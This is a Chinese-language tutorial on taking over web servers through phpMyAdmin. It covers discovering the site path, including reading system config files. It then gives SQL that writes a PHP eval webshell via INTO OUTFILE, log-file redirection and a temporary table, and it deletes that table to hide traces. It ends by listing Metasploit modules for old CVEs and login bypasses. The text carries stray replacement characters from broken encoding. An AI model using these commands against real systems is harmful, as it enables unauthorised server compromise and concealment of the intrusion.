phpMydmin的簡(jiǎn)介以及GetShell的用法
發(fā)布時(shí)間:2021-09-14 11:25
來(lái)源:億速云
閱讀:0
作者:chen
欄目: 網(wǎng)絡(luò )安全
歡迎投稿:712375056
本篇內容介紹了“phpMydmin的簡(jiǎn)介以及GetShell的用法”的有關(guān)知識����,在實(shí)際案例的操作過(guò)程中���,不少人都會(huì )遇到這樣的困境�����,接下來(lái)就讓小編帶領(lǐng)大家學(xué)習一下如何處理這些情況吧�����!希望大家仔細閱讀�,能夠學(xué)有所成����!
phpMyadmin簡(jiǎn)介
phpMyadmin是一個(gè)以PHP為基礎的數據庫管理工具����,使網(wǎng)站管理員可通過(guò)Web接口管理數據庫 �����。
信息收集
此部分主要需要收集的是網(wǎng)站物理路徑���,否則后續無(wú)法通過(guò)URL連接Shell
物理路徑
查詢(xún)數據庫存儲路徑來(lái)推測網(wǎng)站物理路徑����,也可以通過(guò)log變量得到
select @@datadir;
配置文件爆路徑:如果注入點(diǎn)有文件讀取權限��,可通過(guò)load_file嘗試讀取配置文件
# Windows
c:\windows\php.ini # php配置文件
c:\windows\system32\inetsrv\MetaBase.xml # IIS虛擬主機配置文件
# Linux
/etc/php.ini # php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf # Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置文件
單引號爆路徑:直接在URL后面加單引號�。要求單引號沒(méi)有被過(guò)濾(gpc=off)且默認返回錯誤信息�����。
www.abc.com/index.php?id=1'
錯誤參數值爆路徑:嘗試將要提交的參數值改成錯誤值���。
www.abc.com/index.php?id=-1
Nginx文件類(lèi)型錯誤解析爆路徑:要求Web服務(wù)器是Nginx�,且存在文件類(lèi)型解析漏洞�����。在圖片地址后添加/x.php���,該圖片不但會(huì )被當作php文件執行�����,還有可能爆出物理路徑��。
www.abc.com/bg.jpg/x.php
Google爆路徑
site:xxx.com warning
site:xxx.com “fatal error”
測試文件爆路徑
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
其它
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1
/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/phpinfo.php
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
其它信息
phpMyadmin后臺面板可以直接看到MySQL版本��、當前用戶(hù)�、操作系統���、PHP版本���、phpMyadmin版本等信息
也可以通過(guò)SQL查詢(xún)得到其它信息
select version(); -- 查看數據庫版本
select @@datadir; -- 查看數據庫存儲路徑
show VARIABLES like '%char%'; -- 查看系統變量
GetShell
前提條件
網(wǎng)站真實(shí)路徑����。如果不知道網(wǎng)站真實(shí)路徑則后續無(wú)法通過(guò)URL的方式連shell
讀寫(xiě)權限�����。查詢(xún)secure_file_priv參數�����,查看是否具有讀寫(xiě)文件權限����,若為NULL則沒(méi)有辦法寫(xiě)入shell����。這個(gè)值是只讀變量�����,只能通過(guò)配置文件修改��,且更改后需重啟服務(wù)才生效
select @@secure_file_priv -- 查詢(xún)secure_file_priv
-- secure_file_priv=NULL,禁止導入導出
-- secure_file_priv='',不限制導入導出
-- secure_file_priv=/path/,只能向指定目錄導入導出
select load_file('c:/phpinfo.php'); -- 讀取文件
select '123' into outfile 'c:/shell.php'; -- 寫(xiě)入文件常規GetShell
直接通過(guò)SQL查詢(xún)寫(xiě)入shell
-- 假設物理路徑為 "G:\phpStudy\WWW"
select '<?php eval($_POST["pwd"]);?>' into outfile 'G:/phpStudy/WWW/shell.php';
日志GetShell
MySQL5.0版本以上會(huì )創(chuàng )建日志文件���,通過(guò)修改日志的全局變量打開(kāi)日志并指定日志保存路徑����,再通過(guò)查詢(xún)寫(xiě)入一句話(huà)木馬�,此時(shí)該木馬會(huì )被日志記錄并生成日志文件����,從而GetShell�。但是前提是要對生成的日志文件有讀寫(xiě)權限��。
查詢(xún)日志全局變量
show variables like '%general%';
Variable_name Value
general_log OFF
general_log_file G:\phpStudy\MySQL\data\FengSec.log
general_log:日志保存狀態(tài)
general_log_file:日志保存路徑
開(kāi)啟日志保存并配置保存路徑
set global general_log = "ON"; -- 打開(kāi)日志保存
set global general_log_file = "G:/phpstudy/WWW/log.php"; -- 設置日志保存路徑,需先得知網(wǎng)站物理路徑,否則即使寫(xiě)入了Shell也無(wú)法通過(guò)URL連接
寫(xiě)shell
select '<?php eval($_POST[pwd]); ?>';
新表GetShell
進(jìn)入一個(gè)數據庫���,新建數據表��。
名字隨意��,這里為shell_table
字段數填1
添加字段
字段名任意�����,這里為xiaoma
字段類(lèi)型為T(mén)EXT
在該表中點(diǎn)擊插入�,值為一句話(huà)木馬
<?php eval($_POST[pwd]); ?>'
執行SQL查詢(xún)���,將該表中的內容導出到指定文件
-- 假設物理路徑為 "G:\phpStudy\WWW"
select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";
刪除該表�����,抹除痕跡
Drop TABLE IF EXISTS shell_table;
以上步驟也可以通過(guò)MySQL語(yǔ)句執行
Create TABLE shell_table (xiaoma text NOT NULL) -- 建表
Insert INTO shell_table (xiaoma) VALUES('<?php eval($_POST[1]);?>'); -- 寫(xiě)入
select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php'; -- 導出
Drop TABLE IF EXISTS shell_table; -- 刪表特殊版本GetShell
CVE-2013-3238
影響版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模塊:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
影響版本:phpMyAdmin v3.5.2.2
利用模塊:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令執行
影響版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模塊:exploit/unix/webapp/phpmyadmin_config
弱口令&萬(wàn)能密碼
弱口令:版本phpmyadmin2.11.9.2����, 直接root用戶(hù)登陸�,無(wú)需密碼
萬(wàn)能密碼:版本2.11.3 / 2.11.4��,用戶(hù)名'localhost'@'@"則登錄成功
